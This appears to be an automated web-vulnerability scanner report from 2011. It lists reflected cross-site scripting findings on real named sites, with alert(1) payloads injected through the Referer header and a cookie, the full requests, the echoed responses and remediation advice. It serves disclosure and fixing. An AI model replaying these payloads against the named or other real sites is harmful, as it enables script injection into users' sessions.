GET / HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ffa0b'-alert(1)-'f8b58c61969
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5a6'-alert(1)-'f51a024305a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7a5a6'-alert(1)-'f51a024305a
The value of the Referer HTTP header is copied into a JavaScript inline comment. The payload 30512*/alert(1)//6a54575b69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:50:19 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:50:19 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28760
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... :50"; s.eVar6=""; s.hier1="entertainment|root"; s.hier2="events.cbs6albany.com|entertainment|events|events|root"; /** domain=events.cbs6albany.com **/
/** referer=http://www.google.com/search?hl=en&q=30512*/alert(1)//6a54575b69 **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code) //if(navigator.appVersion.indexOf('MSIE')> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98560'-alert(1)-'35d8e8b408e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=98560'-alert(1)-'35d8e8b408e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e7e1'-alert(1)-'d1ec1d083c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3e7e1'-alert(1)-'d1ec1d083c3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48c4b'-alert(1)-'aa630895a23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=48c4b'-alert(1)-'aa630895a23
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa18c'-alert(1)-'e132931c5dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aa18c'-alert(1)-'e132931c5dd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d2d'-alert(1)-'c3f6f59e0c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=72d2d'-alert(1)-'c3f6f59e0c0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5e2'-alert(1)-'3ba738e3b95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=de5e2'-alert(1)-'3ba738e3b95
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d83'-alert(1)-'43e531d6dcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=50d83'-alert(1)-'43e531d6dcf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19fe'-alert(1)-'3e5a0cefaf9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d19fe'-alert(1)-'3e5a0cefaf9
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f58e6<script>alert(1)</script>92948c436fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f58e6<script>alert(1)</script>92948c436fb
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:22 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 93088
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>f58e6<script>alert(1)</script>92948c436fb - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405bb"><script>alert(1)</script>f8b1a525fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=405bb"><script>alert(1)</script>f8b1a525fe6
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:20 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93102
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=405bb"><script>alert(1)</script>f8b1a525fe6" /> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bcc'%3balert(1)//f730c6ce108 was submitted in the cli cookie. This input was echoed as 33bcc';alert(1)//f730c6ce108 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/bzo.847.CD39C435/ATF HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b333bcc'%3balert(1)//f730c6ce108; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7087 Date: Fri, 28 Jan 2011 16:37:18 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-68756736_1296232638","http://ad.doubleclick.net//bzo.847.CD39C435/ATF;net=bzo;u=,bzo-68756736_1296232638,11d765b6a10b1b333bcc';alert(1)//f730c6ce108,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 567d1'%3balert(1)//8127cba5a34 was submitted in the cli cookie. This input was echoed as 567d1';alert(1)//8127cba5a34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3567d1'%3balert(1)//8127cba5a34; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:27 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:27 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT Content-Length: 7745
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... vascript">CollectiveMedia.createAndAttachAd("iblocal-22806307_1296266067","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22806307_1296266067,11d765b6a10b1b3567d1';alert(1)//8127cba5a34,Miscellaneous,;;sz=300x250;net=iblocal;env=ifr;ord1=80394;contx=Miscellaneous;dc=w;btg=;ord=0.9691057777963579?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 219ad"%3balert(1)//eb02bd66d47 was submitted in the cli cookie. This input was echoed as 219ad";alert(1)//eb02bd66d47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3219ad"%3balert(1)//eb02bd66d47; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:26 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT Content-Length: 7745
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... </scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3219ad";alert(1)//eb02bd66d47&seg_code=noseg&ord=1296266066",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=164628109;re ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca275'%3balert(1)//bab4de1adb9 was submitted in the cli cookie. This input was echoed as ca275';alert(1)//bab4de1adb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:39 GMT Connection: close Content-Length: 7241
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-12740564_1296266079","http://ad.doubleclick.net/adj/q1.bosherald/be_ent;net=q1;u=,q1-12740564_1296266079,11d765b6a10b1b3ca275';alert(1)//bab4de1adb9,ent,;;sz=300x250;net=q1;env=ifr;ord1=204282;contx=ent;dc=w;btg=;ord=2134060438??","300","250",false);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e74d'%3balert(1)//8718b1bc98e was submitted in the cli cookie. This input was echoed as 1e74d';alert(1)//8718b1bc98e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Content-Length: 7244
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-79405113_1296266073","http://ad.doubleclick.net/adj/q1.bosherald/be_ent_fr;net=q1;u=,q1-79405113_1296266073,11d765b6a10b1b31e74d';alert(1)//8718b1bc98e,ent,;;sz=300x250;net=q1;env=ifr;ord1=359683;contx=ent;dc=w;btg=;ord=1194202561??","300","250",false);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f52a'%3balert(1)//5cd194822d7 was submitted in the cli cookie. This input was echoed as 1f52a';alert(1)//5cd194822d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:35 GMT Connection: close Content-Length: 7237
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-27651854_1296266075","http://ad.doubleclick.net/adj/q1.bosherald/ent;net=q1;u=,q1-27651854_1296266075,11d765b6a10b1b31f52a';alert(1)//5cd194822d7,ent,;;sz=300x250;net=q1;env=ifr;ord1=173312;contx=ent;dc=w;btg=;ord=395221226??","300","250",false);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aed7'%3balert(1)//fa2fa400f77 was submitted in the cli cookie. This input was echoed as 8aed7';alert(1)//fa2fa400f77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Content-Length: 7240
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-23360047_1296266073","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-23360047_1296266073,11d765b6a10b1b38aed7';alert(1)//fa2fa400f77,ent,;;sz=300x250;net=q1;env=ifr;ord1=820052;contx=ent;dc=w;btg=;ord=269011797??","300","250",false);</scr'+'ipt> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5bd7'%3balert(1)//464e19fd8c7 was submitted in the cli cookie. This input was echoed as e5bd7';alert(1)//464e19fd8c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
